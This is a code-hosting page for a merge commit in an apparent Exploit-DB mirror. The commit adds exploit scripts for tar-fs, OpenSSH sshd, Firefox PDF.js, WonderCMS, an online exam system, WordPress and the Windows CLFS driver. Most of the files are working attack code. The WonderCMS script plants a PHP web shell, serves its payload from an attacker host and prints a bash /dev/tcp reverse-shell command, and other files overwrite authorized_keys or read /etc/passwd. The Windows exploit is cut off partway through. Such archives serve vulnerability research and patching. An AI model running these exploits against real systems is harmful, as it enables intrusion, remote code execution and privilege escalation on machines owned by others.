bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-04-24 00:02:55 +00:00
commit 0f05972f2e
9 changed files with 1943 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

55
exploits/linux/local/52268.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: tar-fs 3.0.0 - Arbitrary File Write/Overwrite
# Date: 17th April, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Software link: https://github.com/mafintosh/tar-fs
# Version: tar-fs 3.0.0
# Tested on: Ubuntu
# CVE: CVE-2024-12905
# Run the command: Example: python3 exploit.py authorized_keys ../../../../../../../../home/user1/authorized_keys
# This will generate two tar file: stage_1.tar and stage_2.tar
# Upload stage_1.tar first to unarchive the symlink
# Next, upload stage_2.tar to finally write/overwrite the file on the system
import os
import sys
import tarfile
link_name = "normal_file"
def check_arguments():
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} <path_to_file_contents> <path_to_target_file_to_overwrite>\n\
Example: {sys.argv[0]} authorized_keys ../../../../../../../../home/user1/authorized_keys\
")
sys.exit()
content_file_path = sys.argv[1]
target_file_path = sys.argv[2]
return content_file_path, target_file_path
def create_symlink(link_name, target_path):
os.symlink(target_path, link_name)
print("[+] Created symlink: {link_name} -> {target_path}")
def archive_files(archive_name, file_path):
tar = tarfile.open(archive_name, 'w')
tar.add(file_path, link_name, recursive=False)
tar.close()
print(f"[+] Archived to: {archive_name}")
def main():
content_path, target_file = check_arguments()
stage_1_archive_name = "stage_1.tar"
stage_2_archive_name = "stage_2.tar"
create_symlink(link_name, target_file)
archive_files(stage_1_archive_name, link_name)
archive_files(stage_2_archive_name, content_path)
if __name__ == "__main__":
main()

575
exploits/linux/remote/52269.c Normal file
View file

@ -0,0 +1,575 @@
* Exploit Title : OpenSSH server (sshd) 9.8p1 - Race Condition
* Author : Milad Karimi (Ex3ptionaL)
* Date : 2025-04-16
*
* Description:
* Targets a signal handler race condition in OpenSSH's
* server (sshd) on glibc-based Linux systems. It exploits a vulnerability
* where the SIGALRM handler calls async-signal-unsafe functions, leading
* to rce as root.
*
* Notes:
* 1. Shellcode : Replace placeholder with actual payload.
* 2. GLIBC_BASES : Needs adjustment for specific target systems.
* 3. Timing parameters: Fine-tune based on target system responsiveness.
* 4. Heap layout : Requires tweaking for different OpenSSH versions.
* 5. File structure offsets: Verify for the specific glibc version.
* -------------------------------------------------------------------------
*/
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <time.h>
#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)
// Possible glibc base addresses (for ASLR bypass)
uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };
int NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]);
// Shellcode placeholder (replace with actual shellcode)
unsigned char shellcode[] = "\x90\x90\x90\x90";
int setup_connection (const char *ip, int port);
void send_packet (int sock, unsigned char packet_type,
const unsigned char *data, size_t len);
void prepare_heap (int sock);
void time_final_packet (int sock, double *parsing_time);
int attempt_race_condition (int sock, double parsing_time,
uint64_t glibc_base);
double measure_response_time (int sock, int error_type);
void create_public_key_packet (unsigned char *packet, size_t size,
uint64_t glibc_base);
void create_fake_file_structure (unsigned char *data, size_t size,
uint64_t glibc_base);
void send_ssh_version (int sock);
int receive_ssh_version (int sock);
void send_kex_init (int sock);
int receive_kex_init (int sock);
int perform_ssh_handshake (int sock);
int
main (int argc, char *argv[])
{
if (argc != 3)
{
fprintf (stderr, "Usage: %s <ip> <port>\n", argv[0]);
exit (1);
}
const char *ip = argv[1];
int port = atoi (argv[2]);
double parsing_time = 0;
int success = 0;
srand (time (NULL));
// Attempt exploitation for each possible glibc base address
for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
{
uint64_t glibc_base = GLIBC_BASES[base_idx];
printf ("Attempting exploitation with glibc base: 0x%lx\n",
glibc_base);
// The advisory mentions "~10,000 tries on average"
for (int attempt = 0; attempt < 20000 && !success; attempt++)
{
if (attempt % 1000 == 0)
{
printf ("Attempt %d of 20000\n", attempt);
}
int sock = setup_connection (ip, port);
if (sock < 0)
{
fprintf (stderr, "Failed to establish connection, attempt
%d\n",
attempt);
continue;
}
if (perform_ssh_handshake (sock) < 0)
{
fprintf (stderr, "SSH handshake failed, attempt %d\n",
attempt);
close (sock);
continue;
}
prepare_heap (sock);
time_final_packet (sock, &parsing_time);
if (attempt_race_condition (sock, parsing_time, glibc_base))
{
printf ("Possible exploitation success on attempt %d with
glibc "
"base 0x%lx!\n",
attempt, glibc_base);
success = 1;
break;
}
close (sock);
usleep (100000); // 100ms delay between attempts, as mentioned in
the
// advisory
}
}
return !success;
}
int
setup_connection (const char *ip, int port)
{
int sock = socket (AF_INET, SOCK_STREAM, 0);
if (sock < 0)
{
perror ("socket");
return -1;
}
struct sockaddr_in server_addr;
memset (&server_addr, 0, sizeof (server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons (port);
if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0)
{
perror ("inet_pton");
close (sock);
return -1;
}
if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr))
< 0)
{
perror ("connect");
close (sock);
return -1;
}
// Set socket to non-blocking mode
int flags = fcntl (sock, F_GETFL, 0);
fcntl (sock, F_SETFL, flags | O_NONBLOCK);
return sock;
}
void
send_packet (int sock, unsigned char packet_type, const unsigned char *data,
size_t len)
{
unsigned char packet[MAX_PACKET_SIZE];
size_t packet_len = len + 5;
packet[0] = (packet_len >> 24) & 0xFF;
packet[1] = (packet_len >> 16) & 0xFF;
packet[2] = (packet_len >> 8) & 0xFF;
packet[3] = packet_len & 0xFF;
packet[4] = packet_type;
memcpy (packet + 5, data, len);
if (send (sock, packet, packet_len, 0) < 0)
{
perror ("send_packet");
}
}
void
send_ssh_version (int sock)
{
const char *ssh_version = "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n";
if (send (sock, ssh_version, strlen (ssh_version), 0) < 0)
{
perror ("send ssh version");
}
}
int
receive_ssh_version (int sock)
{
char buffer[256];
ssize_t received;
do
{
received = recv (sock, buffer, sizeof (buffer) - 1, 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
if (received > 0)
{
buffer[received] = '\0';
printf ("Received SSH version: %s", buffer);
return 0;
}
else if (received == 0)
{
fprintf (stderr, "Connection closed while receiving SSH version\n");
}
else
{
perror ("receive ssh version");
}
return -1;
}
void
send_kex_init (int sock)
{
unsigned char kexinit_payload[36] = { 0 };
send_packet (sock, 20, kexinit_payload, sizeof (kexinit_payload));
}
int
receive_kex_init (int sock)
{
unsigned char buffer[1024];
ssize_t received;
do
{
received = recv (sock, buffer, sizeof (buffer), 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
if (received > 0)
{
printf ("Received KEX_INIT (%zd bytes)\n", received);
return 0;
}
else if (received == 0)
{
fprintf (stderr, "Connection closed while receiving KEX_INIT\n");
}
else
{
perror ("receive kex init");
}
return -1;
}
int
perform_ssh_handshake (int sock)
{
send_ssh_version (sock);
if (receive_ssh_version (sock) < 0)
return -1;
send_kex_init (sock);
if (receive_kex_init (sock) < 0)
return -1;
return 0;
}
void
prepare_heap (int sock)
{
// Packet a: Allocate and free tcache chunks
for (int i = 0; i < 10; i++)
{
unsigned char tcache_chunk[64];
memset (tcache_chunk, 'A', sizeof (tcache_chunk));
send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk));
// These will be freed by the server, populating tcache
}
// Packet b: Create 27 pairs of large (~8KB) and small (320B) holes
for (int i = 0; i < 27; i++)
{
// Allocate large chunk (~8KB)
unsigned char large_hole[8192];
memset (large_hole, 'B', sizeof (large_hole));
send_packet (sock, 5, large_hole, sizeof (large_hole));
// Allocate small chunk (320B)
unsigned char small_hole[320];
memset (small_hole, 'C', sizeof (small_hole));
send_packet (sock, 5, small_hole, sizeof (small_hole));
}
// Packet c: Write fake headers, footers, vtable and _codecvt pointers
for (int i = 0; i < 27; i++)
{
unsigned char fake_data[4096];
create_fake_file_structure (fake_data, sizeof (fake_data),
GLIBC_BASES[0]);
send_packet (sock, 5, fake_data, sizeof (fake_data));
}
// Packet d: Ensure holes are in correct malloc bins (send ~256KB string)
unsigned char large_string[MAX_PACKET_SIZE - 1];
memset (large_string, 'E', sizeof (large_string));
send_packet (sock, 5, large_string, sizeof (large_string));
}
void
create_fake_file_structure (unsigned char *data, size_t size,
uint64_t glibc_base)
{
memset (data, 0, size);
struct
{
void *_IO_read_ptr;
void *_IO_read_end;
void *_IO_read_base;
void *_IO_write_base;
void *_IO_write_ptr;
void *_IO_write_end;
void *_IO_buf_base;
void *_IO_buf_end;
void *_IO_save_base;
void *_IO_backup_base;
void *_IO_save_end;
void *_markers;
void *_chain;
int _fileno;
int _flags;
int _mode;
char _unused2[40];
void *_vtable_offset;
} *fake_file = (void *)data;
// Set _vtable_offset to 0x61 as described in the advisory
fake_file->_vtable_offset = (void *)0x61;
// Set up fake vtable and _codecvt pointers
*(uint64_t *)(data + size - 16)
= glibc_base + 0x21b740; // fake vtable (_IO_wfile_jumps)
*(uint64_t *)(data + size - 8) = glibc_base + 0x21d7f8; // fake _codecvt
}
void
time_final_packet (int sock, double *parsing_time)
{
double time_before = measure_response_time (sock, 1);
double time_after = measure_response_time (sock, 2);
*parsing_time = time_after - time_before;
printf ("Estimated parsing time: %.6f seconds\n", *parsing_time);
}
double
measure_response_time (int sock, int error_type)
{
unsigned char error_packet[1024];
size_t packet_size;
if (error_type == 1)
{
// Error before sshkey_from_blob
packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3");
}
else
{
// Error after sshkey_from_blob
packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9");
}
struct timespec start, end;
clock_gettime (CLOCK_MONOTONIC, &start);
send_packet (sock, 50, error_packet,
packet_size); // SSH_MSG_USERAUTH_REQUEST
char response[1024];
ssize_t received;
do
{
received = recv (sock, response, sizeof (response), 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
clock_gettime (CLOCK_MONOTONIC, &end);
double elapsed
= (end.tv_sec - start.tv_sec) + (end.tv_nsec - start.tv_nsec) / 1e9;
return elapsed;
}
void
create_public_key_packet (unsigned char *packet, size_t size,
uint64_t glibc_base)
{
memset (packet, 0, size);
size_t offset = 0;
for (int i = 0; i < 27; i++)
{
// malloc(~4KB) - This is for the large hole
*(uint32_t *)(packet + offset) = CHUNK_ALIGN (4096);
offset += CHUNK_ALIGN (4096);
// malloc(304) - This is for the small hole (potential FILE structure)
*(uint32_t *)(packet + offset) = CHUNK_ALIGN (304);
offset += CHUNK_ALIGN (304);
}
// Add necessary headers for the SSH public key format
memcpy (packet, "ssh-rsa ", 8);
// Place shellcode in the heap via previous allocations
memcpy (packet + CHUNK_ALIGN (4096) * 13 + CHUNK_ALIGN (304) * 13,
shellcode,
sizeof (shellcode));
// Set up the fake FILE structures within the packet
for (int i = 0; i < 27; i++)
{
create_fake_file_structure (packet + CHUNK_ALIGN (4096) * (i + 1)
+ CHUNK_ALIGN (304) * i,
CHUNK_ALIGN (304), glibc_base);
}
}
int
attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base)
{
unsigned char final_packet[MAX_PACKET_SIZE];
create_public_key_packet (final_packet, sizeof (final_packet),
glibc_base);
// Send all but the last byte
if (send (sock, final_packet, sizeof (final_packet) - 1, 0) < 0)
{
perror ("send final packet");
return 0;
}
// Precise timing for last byte
struct timespec start, current;
clock_gettime (CLOCK_MONOTONIC, &start);
while (1)
{
clock_gettime (CLOCK_MONOTONIC, &current);
double elapsed = (current.tv_sec - start.tv_sec)
+ (current.tv_nsec - start.tv_nsec) / 1e9;
if (elapsed >= (LOGIN_GRACE_TIME - parsing_time - 0.001))
{ // 1ms before SIGALRM
if (send (sock, &final_packet[sizeof (final_packet) - 1], 1, 0) <
0)
{
perror ("send last byte");
return 0;
}
break;
}
}
// Check for successful exploitation
char response[1024];
ssize_t received = recv (sock, response, sizeof (response), 0);
if (received > 0)
{
printf ("Received response after exploit attempt (%zd bytes)\n",
received);
// Analyze response to determine if we hit the "large" race window
if (memcmp (response, "SSH-2.0-", 8) != 0)
{
printf ("Possible hit on 'large' race window\n");
return 1;
}
}
else if (received == 0)
{
printf (
"Connection closed by server - possible successful
exploitation\n");
return 1;
}
else if (errno == EWOULDBLOCK || errno == EAGAIN)
{
printf ("No immediate response from server - possible successful "
"exploitation\n");
return 1;
}
else
{
perror ("recv");
}
return 0;
}
int
perform_exploit (const char *ip, int port)
{
int success = 0;
double parsing_time = 0;
double timing_adjustment = 0;
for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
{
uint64_t glibc_base = GLIBC_BASES[base_idx];
printf ("Attempting exploitation with glibc base: 0x%lx\n",
glibc_base);
for (int attempt = 0; attempt < 10000 && !success; attempt++)
{
if (attempt % 1000 == 0)
{
printf ("Attempt %d of 10000\n", attempt);
}
int sock = setup_connection (ip, port);
if (sock < 0)
{
fprintf (stderr, "Failed to establish connection, attempt
%d\n",
attempt);
continue;
}
if (perform_ssh_handshake (sock) < 0)
{
fprintf (stderr, "SSH handshake failed, attempt %d\n",
attempt);
close (sock);
continue;
}
prepare_heap (sock);
time_final_packet (sock, &parsing_time);
// Implement feedback-based timing strategy
parsing_time += timing_adjustment;
if (attempt_race_condition (sock, parsing_time, glibc_base))
{
printf ("Possible exploitation success on attempt %d with
glibc "
"base 0x%lx!\n",
attempt, glibc_base);
success = 1;
// In a real exploit, we would now attempt to interact with
the
// shell
}
else
{
// Adjust timing based on feedback
timing_adjustment += 0.00001; // Small incremental adjustment
}
close (sock);
usleep (100000); // 100ms delay between attempts, as mentioned in
the
// advisory
}
}
return success;
}

194
exploits/multiple/remote/52273.py Executable file
View file

@ -0,0 +1,194 @@
# Exploit Title: Firefox ESR 115.11 - Arbitrary JavaScript execution in
PDF.js
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage: https://wordpress.org
# Version: = 115.11
# Tested on: Win, Ubuntu
# CVE : CVE-2024-4367
#!/usr/bin/env python3
import sys
def generate_payload(payload):
backslash_char = "\\"
fmt_payload = payload.replace('(', '\\(').replace(')', '\\)')
font_matrix = f"/FontMatrix [0.1 0 0 0.1 0 (1{backslash_char});\n" +
f"{fmt_payload}" + "\n//)]"
return f"""
%PDF-1.4
%DUMMY
8 0 obj
<<
/PatternType 2
/Shading<<
/Function<<
/Domain[0 1]
/C0[0 0 1]
/C1[1 0.6 0]
/N 1
/FunctionType 2
>>
/ShadingType 2
/Coords[46 400 537 400]
/Extend[false false]
/ColorSpace/DeviceRGB
>>
/Type/Pattern
>>
endobj
5 0 obj
<<
/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 573 0 573 0 341]
/Type/Font
/BaseFont/PAXEKO+SourceSansPro-Bold
/LastChar 102
/Encoding/WinAnsiEncoding
{font_matrix}
/Subtype/Type1
/FirstChar 65
/FontDescriptor 9 0 R
>>
endobj
2 0 obj
<<
/Kids[3 0 R]
/Type/Pages
/Count 1
>>
endobj
9 0 obj
<<
/Type/FontDescriptor
/ItalicAngle 0
/Ascent 751
/FontBBox[-6 -12 579 713]
/FontName/PAXEKO+SourceSansPro-Bold
/StemV 100
/CapHeight 713
/Flags 32
/FontFile3 10 0 R
/Descent -173
/MissingWidth 250
>>
endobj
6 0 obj
<<
/Length 128
>>
stream
47 379 489 230 re S
/Pattern cs
BT
50 500 Td
117 TL
/F1 150 Tf
/P1 scn
(AbCdEf) Tj
/P2 scn
(AbCdEf) '
ET
endstream
endobj
3 0 obj
<<
/Type/Page
/Resources 4 0 R
/Contents 6 0 R
/Parent 2 0 R
/MediaBox[0 0 595.2756 841.8898]
>>
endobj
10 0 obj
<<
/Length 800
/Subtype/Type2
>>
stream
endstream
endobj
7 0 obj
<<
/PatternType 1
/Matrix[1 0 0 1 50 0]
/Length 58
/TilingType 1
/BBox[0 0 16 16]
/YStep 16
/PaintType 1
/Resources<<
>>
/XStep 16
>>
stream
0.65 g
0 0 16 16 re f
0.15 g
0 0 8 8 re f
8 8 8 8 re f
endstream
endobj
4 0 obj
<<
/Pattern<<
/P1 7 0 R
/P2 8 0 R
>>
/Font<<
/F1 5 0 R
>>
>>
endobj
1 0 obj
<<
/Pages 2 0 R
/Type/Catalog
/OpenAction[3 0 R /Fit]
>>
endobj
xref
0 11
0000000000 65535 f
0000002260 00000 n
0000000522 00000 n
0000000973 00000 n
0000002178 00000 n
0000000266 00000 n
0000000794 00000 n
0000001953 00000 n
0000000015 00000 n
0000000577 00000 n
0000001085 00000 n
trailer
<<
/ID[(DUMMY) (DUMMY)]
/Root 1 0 R
/Size 11
>>
startxref
2333
%%EOF
"""
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <payload>")
sys.exit(1)
print("[+] Created malicious PDF file: poc.pdf")
print("[+] Open the file with the vulnerable application to trigger the
exploit.")
payload = generate_payload(
sys.argv[1])
with open("poc.pdf", "w") as f:
f.write(payload)
sys.exit(0)

82
exploits/php/remote/52271.py Executable file
View file

@ -0,0 +1,82 @@
# Exploit Title: WonderCMS 3.4.2 - Remote Code Execution (RCE)
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# CVE: CVE-2023-41425
import requests
import argparse
from argparse import RawTextHelpFormatter
import os
import subprocess
import zipfile
from termcolor import colored
def main():
parser = argparse.ArgumentParser(description="Exploit Wonder CMS v3.4.2
XSS to RCE", formatter_class=RawTextHelpFormatter)
parser.add_argument("--url", required=True, help="Target URL of
loginURL (Example: http://sea.htb/loginURL)")
parser.add_argument("--xip", required=True, help="IP for HTTP web
server that hosts the malicious .js file")
parser.add_argument("--xport", required=True, help="Port for HTTP web
server that hosts the malicious .js file")
args = parser.parse_args()
target_login_url = args.url
target_split = args.url.split('/')
target_url = target_split[0] + '//' + target_split[2]
# Web Shell
print("[+] Creating PHP Web Shell")
if not os.path.exists('malicious'):
os.mkdir('malicious')
with open ('malicious/malicious.php', 'w') as f:
f.write('<?php system($_GET["cmd"]); ?>')
with zipfile.ZipFile('./malicious.zip', 'w') as z:
z.write('malicious/malicious.php')
os.remove('malicious/malicious.php')
os.rmdir('malicious')
else:
print(colored("[!] Directory malicious already exists!", 'yellow'))
# Malicious .js
js = f'''var token =
document.querySelectorAll('[name="token"]')[0].value;
var module_url =
"{target_url}/?installModule=http://{args.xip}:{args.xport}/malicious.zip&directoryName=pwned&type=themes&token="
+ token;
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("GET", module_url);
xhr.send();'''
print("[+] Writing malicious.js")
with open('malicious.js', 'w') as f:
f.write(js)
xss_payload = args.url.replace("loginURL",
"index.php?page=loginURL?")+"\"></form><script+src=\"http://
"+args.xip+":"+args.xport+"/malicious.js\"></script><form+action=\""
print("[+] XSS Payload:")
print(colored(f"{xss_payload}", 'red'))
print("[+] Web Shell can be accessed once .zip file has been
requested:")
print(colored(f"{target_url}/themes/malicious/malicious.php?cmd=<COMMAND>",
'red'))
print("[+] To get a reverse shell connection run the following:")
print(colored(f"curl -s '{target_url}/themes/malicious/malicious.php'
--get --data-urlencode \"cmd=bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT>
0>&1'\" ", 'yellow'))
print("[+] Starting HTTP server")
subprocess.run(["python3", "-m", "http.server", "-b", args.xip,
args.xport])
if __name__ == "__main__":
main()

35
exploits/php/remote/52272.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: code-projects Online Exam Mastering System 1.0 - Reflected Cross-Site Scripting (XSS)
# Google Dork: inurl:/exam/feedback.php
# Date: 2025-04-19
# Exploit Author: Pruthu Raut
# Vendor Homepage: https://code-projects.org/
# Software Link: https://code-projects.org/online-exam-system-in-php-with-source-code/
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Kali Linux (Apache + PHP 7.x)
# CVE : CVE-2025-28121
# Description:
# code-projects Online Exam Mastering System 1.0 is vulnerable to a Reflected XSS vulnerability in feedback.php via the "q" parameter.
# The application fails to sanitize user input properly, allowing attackers to inject arbitrary JavaScript code.
# Vulnerable URL:
# http://localhost/exam/feedback.php?q=Thank%20you%20for%20your%20valuable%20feedback
# PoC (Proof of Concept):
# Payload:
http://localhost/exam/feedback.php?q=<script>alert('XSS')</script>
# Steps to Reproduce:
# 1. Host the application locally using XAMPP or a similar stack.
# 2. Open the vulnerable URL with the payload in a browser.
# 3. The JavaScript alert will be executed, demonstrating reflected XSS.
# Impact:
# - Account takeover via stolen cookies if a privileged user clicks the malicious link.
# - Full control of victims session context if exploited properly.
# - Can be chained with social engineering to target administrators.
# Mitigation:
# - Use `htmlspecialchars()` or a proper encoding mechanism to sanitize user input.
# - Implement Content Security Policy (CSP) headers.
# - Avoid reflecting unsanitized GET parameters into the HTML response.

34
exploits/php/webapps/52274.py Executable file
View file

@ -0,0 +1,34 @@
# Exploit Title: WordPress Core 6.2 - Directory Traversal
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Version: = 6.2
# Tested on: Win, Ubuntu
# CVE : CVE-2023-2745
import requests
from colorama import init, Fore, Style
init(autoreset=True)
url = input("E.G https://example.com/wp-login.php : ")
payload = '../../../../../etc/passwd'
response = requests.get(url, params={'wp_lang': payload})
if response.status_code == 200:
if "root:x:0:0:root" in response.text:
print(Fore.GREEN + 'Exploit successful, accessed content:')
print(Fore.GREEN + response.text)
else:
print(Fore.YELLOW + 'Accessed content, but the expected file was
not found:')
print(Fore.YELLOW + response.text)
elif response.status_code in {400, 401, 403, 404}:
print(Fore.RED + f'Client error, status code: {response.status_code}')
elif response.status_code // 100 == 5:
print(Fore.RED + f'Server error, status code: {response.status_code}')
elif response.status_code // 100 == 3:
print(Fore.YELLOW + f'Redirection, status code:
{response.status_code}')
else:
print(f'Status code: {response.status_code}')

567
exploits/windows/local/52270.c Normal file
View file

@ -0,0 +1,567 @@
# Exploit Title: Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# CVE: CVE-2024-49138
#include <iostream>
#include <Windows.h>
#include <clfsw32.h>
#include <format>
#include <psapi.h>
#include <iostream>
#include <fstream>
#include <iomanip>
#include <vector>
#include <cstdint>
#include "resource.h"
#define CONTROL_BLOCK_SIZE 0x400
#define OFFSET_EXTENDED_STATE 0x84
#define OFFSET_IEXTENDED_BLOCK 0x88
#define OFFSET_IFLUSHB_BLOCK 0x8c
#define _CRT_SECURE_NO_WARNINGS 1
//dt nt!_KTHREAD current
//+ 0x230 UserAffinityPrimaryGroup : 0
//+ 0x232 PreviousMode : 1 ''
//+ 0x233 BasePriority : 15 ''
//+ 0x234 PriorityDecrement : 0 ''
//+ 0x234 ForegroundBoost : 0y0000
//+ 0x234 UnusualBoost : 0y0000
//+ 0x235 Preempted : 0 ''
//+ 0x236 AdjustReason : 0 ''
//+ 0x237 AdjustIncrement : 0 ''
//+ 0x238 AffinityVersion : 0x14
//+ 0x240 Affinity : 0xffffc201`419e1a58 _KAFFINITY_EX
//WINDBG > dq ffffc201419e1080 + 0x232 L1
//ffffc201`419e12b2 00140000`00000f01
//WINDBG > ? nt!PoFxProcessorNotification - nt
//Evaluate expression : 3861424 = 00000000`003aebb0
//WINDBG > ? nt!DbgkpTriageDumpRestoreState - nt
//Evaluate expression : 8324768 = 00000000`007f06a0
//WINDBG > ? nt!PsActiveProcessHead - nt
//Evaluate expression : 12812128 = 00000000`00c37f60
#define POFXPROCESSORNOTIFICATION_OFFSET 0x3aebb0
#define DBGKPTRIAGEDUMPRESTORESTATE_OFFSET 0x7f06a0
#define PSACTIVEPROCESSHEAD_OFFSET 0xc37f60
#define ACTIVEPROCESSLINKS_OFFSET 0x448
#define UNIQUEPROCESSID_OFFSET 0x440
#define TOKEN_OFFSET 0x4b8
#define TOKENPRIVILEGESPRESENT_OFFSET 0x40
#define TOKENPRIVILEGSENABLED_OFFSET 0x48
#pragma comment(lib, "Clfsw32.lib")
LPVOID GetKernelBaseAddress() {
LPVOID drivers[1024]; // Array to hold driver addresses
DWORD cbNeeded; // Bytes returned by EnumDeviceDrivers
int driverCount;
TCHAR driverName[MAX_PATH];
// Enumerate loaded device drivers
if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) {
printf("Failed to enumerate device drivers. Error: %lu\n",
GetLastError());
return (LPVOID)0x0;
}
driverCount = cbNeeded / sizeof(drivers[0]);
if (driverCount == 0) {
printf("No device drivers found.\n");
return (LPVOID)0x0;
}
// The first driver is usually the Windows kernel
LPVOID kernelBaseAddress = drivers[0];
// Retrieve the name of the kernel driver
if (GetDeviceDriverBaseName(kernelBaseAddress, driverName, MAX_PATH)) {
printf("Kernel Base Address: 0x%p\n", kernelBaseAddress);
printf("Kernel Name: %ls\n", driverName);
}
else {
printf("Failed to retrieve kernel name. Error: %lu\n",
GetLastError());
}
return kernelBaseAddress;
}
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2
using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
// Definitions for NTSTATUS and system calls
using fNtReadVirtualMemory = NTSTATUS(WINAPI*)(
HANDLE ProcessHandle,
PVOID BaseAddress,
PVOID Buffer,
ULONG BufferSize,
PULONG NumberOfBytesRead);
using fNtWriteVirtualMemory = NTSTATUS(WINAPI*)(
HANDLE ProcessHandle,
PVOID BaseAddress,
PVOID Buffer,
ULONG BufferSize,
PULONG NumberOfBytesWritten);
fNtReadVirtualMemory NtReadVirtualMemory = NULL;
fNtWriteVirtualMemory NtWriteVirtualMemory = NULL;
// handle information
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
// handle table information
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
PVOID GetKAddrFromHandle(HANDLE handle) {
ULONG returnLength = 0;
fNtQuerySystemInformation NtQuerySystemInformation =
(fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtQuerySystemInformation");
PSYSTEM_HANDLE_INFORMATION handleTableInformation =
(PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
SystemHandleInformationSize);
NtQuerySystemInformation(SystemHandleInformation,
handleTableInformation, SystemHandleInformationSize, &returnLength);
ULONG numberOfHandles = handleTableInformation->NumberOfHandles;
HeapFree(GetProcessHeap(), 0, handleTableInformation);
handleTableInformation =
(PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
numberOfHandles * sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO) +
sizeof(SYSTEM_HANDLE_INFORMATION) + 0x100);
NtQuerySystemInformation(SystemHandleInformation,
handleTableInformation, numberOfHandles *
sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO) + sizeof(SYSTEM_HANDLE_INFORMATION)
+ 0x100, &returnLength);
for (int i = 0; i < handleTableInformation->NumberOfHandles; i++)
{
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo =
(SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
if (handleInfo.HandleValue == (USHORT)handle &&
handleInfo.UniqueProcessId == GetCurrentProcessId())
{
return handleInfo.Object;
}
}
}
LPVOID g_ntbase = 0;
LPVOID address_to_write;
//Final byte = kthread.previousMode = 0
DWORD64 value_to_write = 0x0014000000000f00;
//BOOL SwapTokens() {
// DWORD64 eprocess = 0;
// ULONG bytesRead = 0;
// DWORD64 systemtoken = 0;
// DWORD64 currenttoken = 0;
// DWORD pid = 0;
// DWORD64 privileges = 0x0000001ff2ffffbc;
//
// NtReadVirtualMemory((HANDLE)-1, (LPVOID)((DWORD64)g_ntbase +
